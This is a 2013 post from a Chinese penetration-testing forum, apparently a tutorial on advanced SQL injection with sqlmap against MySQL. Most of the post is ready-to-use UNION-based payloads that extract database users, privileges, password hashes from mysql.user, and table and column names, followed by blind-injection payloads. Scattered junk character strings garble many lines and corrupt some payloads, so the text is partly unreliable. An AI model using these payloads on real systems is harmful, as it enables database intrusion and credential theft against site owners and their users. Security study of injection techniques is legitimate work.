中国网络渗透测试联盟

标题: sqlmap高级注入 [打印本页]

作者: admin    时间: 2013-7-16 20:31
标题: sqlmap高级注入
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。+ M4 ?: W- B/ g9 J( r% J  T2 A8 S; d8 K

4 g: Q+ _0 m% ]# U8 D* ?这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表7 V) z2 \6 o% w; A3 S0 b

. U% A1 c1 C3 H; U分类标准        分类        备注0 ?5 v2 u' f. k2 b
按字段类型        整型注入,字符型注入          X* A9 g# M9 x: {  E8 {
按出现的位置        get注入,post注入,cookie注入,http header注入       
9 y" O3 Q+ V8 n' v然而高级注入是这样的
' Y+ G6 \2 ^% O: x& c 2 p! J  f7 T8 K# M
高级注入分类        条件
& ]5 o, l" E/ y% t4 u7 G& }error-based sql        数据库的错误回显可以返回,存在数据库,表结构
- v! T: ~' O4 w) Xunion-based sql        能够使用union,存在数据库,表结构
; A* j" _+ L- v  J. wblind sql        存在注入
2 |* n+ Z. W" s" w& ]' }& s我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。+ d9 B% z5 E1 c: _' o" s

9 V+ S# f6 f0 c. J) V7 ~好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火) B: i: P" _# x8 o, ^3 ~' \

# {, ]( p5 j  }. U( C3 \6 A附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
$ k/ q$ y3 q9 z' P* U, F
! c( N) t$ }' @这里用mysql说明
7 `3 g% ~  l9 B / |" O) D! M$ t
e注入坛子里很多了,请看戳我或者再戳我
' W8 k4 w. U/ f" ~! B& j' _! C % f; U" N% g, e' m# _1 |+ W# |6 g( E
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
+ U! i  D0 f0 Y* @3 k' O , g8 [) o: |5 z8 w7 k: N; E
获取当前数据库用户名+ {& w& Y/ d$ g: U3 p! a1 j) n

( L! }2 T  V! X% wUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C; B! T: z  M+ [
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
) W+ [! N. r7 O1 KL, NULL## J' W) e- j( j# w2 t& _
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
4 Q: w' ?# y1 Q! W3 ` 4 U, T8 X6 {* L& v! X
获取数据库名& ~$ t3 e6 G. M5 ?3 h3 A
# a& [1 X3 u6 z9 d' E. i3 k
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#/ d" x! C9 |* \- p8 Q
获取所有用户名% Z8 j' b) q# `. X& @9 g
# _' S7 k" S/ ]2 c* D
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
7 J# _" Y# Y5 e! h7 {7 n查看当前用户权限
8 c2 B' B! i0 g6 w7 e0 C! V; q3 | ; p  g% H& ?9 P; _# z4 {
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
: h5 C* C; [' X# k4 Q  F+ g尝试获取密码,当然需要有能读mysql数据库的权限$ n1 P3 Y, W) v- B% L  X8 V6 Y

& d3 }, L0 P: I8 o# @6 ^# M8 uUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user## ^. t, R8 e: X
获取表名,limit什么的自己搞啦
" m0 U3 p( g0 X" p" |( e
8 q* n# T$ H* MUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
. f  f2 h+ T1 |8 q& E获取字段名及其类型2 l; K  V* W  ]2 V6 y
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
6 o# _  r" @0 k8 i2 r! Q; |, I0 B
; d0 q. m9 T' ^" F9 Nb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。2 T, H  k( `6 q' r8 T1 q

) Z2 X. d( O' n. p3 W如:
, g- Z: s6 e4 n; U获取当前用户名/ {$ p: w* D7 X2 S7 o0 F3 W, a
/ T: c: j  @& K9 ^% J
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1169 f* K! ~6 D- \( f: R
获取当前数据库2 w% b8 k; W- p0 J6 q/ ^
7 J! _- I+ b+ u. O& w5 ^! n7 q
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
3 Q& r+ ?( o' c+ y( O5 H% a/ J获取表名- }% }- |* D! G9 `$ q& G7 B

  x" j( k5 t4 S% }. E# b# jAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 518 w9 s; E, ]9 b  ^. y' w, d- l
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
0 ~" v  j/ r' o$ @5 G8 o5 W回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。- k& }5 }) [1 e% I* V
爆表) z! T1 D2 H! Q! q: W/ G

* e* {7 R6 J& ^, V# x) r2 u6 y" i* t2 iAND EXISTS(select * from table)/ W2 s& i+ m) a2 @' L6 F& A% J1 r
爆字段
( a5 J3 \1 G/ ^3 U. |( t5 n
- L- {+ G3 d) @: L, aAND EXISTS(select pwd from table)
+ v, [% |# N6 E盲注的变化就比较多了,由于篇幅,只是举个例子而已。7 v. N0 {0 _0 R% o7 M" u
5 N& g& A, ^* d6 {+ n; }  S
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
' S% M' j) A& e5 {( `) t




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2